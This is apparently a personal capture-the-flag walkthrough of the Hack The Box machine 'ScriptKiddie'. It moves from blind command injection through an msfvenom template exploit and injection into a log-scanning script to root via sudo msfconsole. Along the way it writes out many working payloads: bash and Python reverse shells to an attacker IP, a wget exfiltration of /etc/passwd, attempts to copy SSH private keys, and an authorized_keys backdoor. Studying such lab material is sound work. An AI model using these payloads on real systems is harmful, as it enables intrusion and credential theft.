ScriptKiddie

Personal Rating: Medium

nmap:

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5

Werkzeug is a Python tool, so the website is based on Python.

I entered my IP for the nmap scan and checked with tcpdump -i tun0 src 10.10.10.226 and the server actually sends requests.

It looks like OS commands are used in the background, so I will try some OS command injections.

With '10.10.16.6; ping 10.10.16.6' at “payloads” I received the ping, so we have a blind OS command injection.

Payloads that worked:

; ping 10.10.16.6
& ping 10.10.16.6

Payloads that did not work:

; a=$(cat /etc/passwd) && wget 
http://10.10.16.6:8000/$a

& nc -lnvp 4444 -e /bin/bash
; wget 
http://10.10.16.6:8000/test

; python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
; export RHOST="10.10.16.6";export RPORT=4444;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Searching for Werkzeug shows this:

Werkzeug - 'Debug Shell' Command Execution | multiple/remote/43905.py

I changed the script to work with Python3, but it did not work. I checked for the /console folder and it is not present, so this exploit will not work.

Checking with Burp, a POST request is sent

ip=%3B+ping+10.10.16.6&action=scan

Changing the action, we get json output:

Since I was stuck, I went to the guided mode. It appears there is a command injection for msfvenom. I honestly did not think about this, but it seems like even vulnerability exploitation tools can have vulnerabilities :)

Metasploit Framework 6.0.11 - msfvenom APK template command injection | multiple/local/49491.py

msfvenom RCE

With the exploit script /usr/share/exploitdb/exploits/multiple/local/49491.py and the payload

'/bin/bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"'

in it, I got a netcat shell on the box!

Internal Enumeration

id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:/home$ ls -la
ls -la
total 16
drwxr-xr-x 4 root root 4096 Feb 3 2021 .
drwxr-xr-x 20 root root 4096 Feb 3 2021 ..
drwxr-xr-x 11 kid kid 4096 Feb 3 2021 kid
drwxr-xr-x 6 pwn pwn 4096 Feb 3 2021 pwn
kid@scriptkiddie:/home$ cd pwn
cd pwn
kid@scriptkiddie:/home/pwn$ ls
ls
recon
scanlosers.sh
kid@scriptkiddie:/home/pwn$

There is another user with interesting stuff in his homedir.

The script seems to run an nmap scan over all IPs in the log file and then clear the log.

ss -tlpn shows no new open ports.

I transferred linpeas and pspy64 onto the host and ran it.

I added my public key to /home/kid/authorized_keys so I could ssh onto the host.

I found the application at /home/kid/html/app.py I will have a look at it.

This part is interesting:

We control the “srcip” through browser input and it is written to the file /home/kid/logs/hackers if it is not a valid IP. But we can write to the file as “kid" anyways.

Combined with the script /home/pwn/scanlosers.sh we can control which IPs are scanned by the script.

I could not find an obvious nmap injection vulnerability for the given version.

I added this to the hackers file:

127.0.0.1"; echo soos > sheesh.txt

To my surprise, the hackers file was empty after I left nano and I found the file sheesh.txt in /home/pwn/ owned by pwn.

Bash Injection

Lets try this with a reverse shell.

127.0.0.1"; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.16.6/6666 0>&1’

The hackers file got cleared again, but I got no reverse shell

The file contains an error:
Failed to resolve "soos".
WARNING: No targets were specified, so 0 hosts scanned.

Failed payloads:

127.0.0.1; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.16.6/6666 0>&1" echo
127.0.0.1 && bash -i >& /dev/tcp/10.10.16.6/6666 0>&1" && echo "
127.0.0.1; bash -i >& /dev/tcp/10.10.16.6/6666 0>&1"; echo "
127.0.0.1 & bash -i >& /dev/tcp/10.10.16.6/6666 0>&1
127.0.0.1"; echo $(cat /home/pwn/.ssh/*) > sheesh.txt
127.0.0.1"; cp /home/pwn/.ssh/id_rsa ./id.txt
test test {touch,testtest.txt}
test test (sh)0>/dev/tcp/10.10.16.6/6666
test test a;{touch,testtest.txt};
test test a";(sh)0>/dev/tcp/10.10.16.6/6666;
test test a"; /tmp/exploit.sh;
test test a";/tmp/exploit.sh;
test test a;/tmp/exploit.sh;
test test a;/tmp/exploit.sh;"
test test a";{bash,/tmp/exploit.sh};
a a 127.0.0.1&{/bin/bash,/tmp/exploit.sh};
a a a;"/tmp/exploit.sh > sheesh.txt
a a /tmp/exploit.sh;"/tmp/exploit.sh > sheesh.txt
a a /bin/bash</tmp/exploit.sh;"/bin/bash</tmp/exploit.sh > sheesh.txt
a a a;"/tmp/exploit.sh;" > aua.txt
a a a;"/tmp/exploit.sh" > aua.txt
a a $(/tmp/exploit.sh)
a a $(../../../tmp/exploit.sh)

The script takes the third field of each line, delimited by space. So I have to create a payload that has no spaces and is at the third field.

I created a script /tmp/exploit.sh

#!/bin/bash

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9c4Xx8Qqg8wzlum73FBbi2UDXvBLLnK4frGPMIzXat" > /home/pwn/.ssh/authorized_keys
bash -i >& /dev/tcp/10.10.16.6/6666 0>&1
touch hacked.txt

This payload finally worked to get a reverse shell as the pwn user:

a a $(bash -c "bash -i >& /dev/tcp/10.10.16.6/6666 0>&1")

I think what I had to do here was to use bash -c and then the actual command. I also had to put it in $() instead of trying it directly.

Also this injection would not execute my script, I do not know why.

Privilege Escalation

sudo -l reveals that the user pwn can execute /opt/metasploit-framework-6.0.9/msfconsole as root without a password.

I ran sudo /opt/metasploit-framework-6.0.9/msfconsole and started an interactive ruby shell with irb

This did not help me.

sudo /opt/metasploit-framework-6.0.9/msfconsole -x id shew me the output of id, so this is the way to go. This worked to get a root shell:

sudo /opt/metasploit-framework-6.0.9/msfconsole -x 'bash -c "bash -i >& /dev/tcp/10.10.16.6/7777 0>&1"'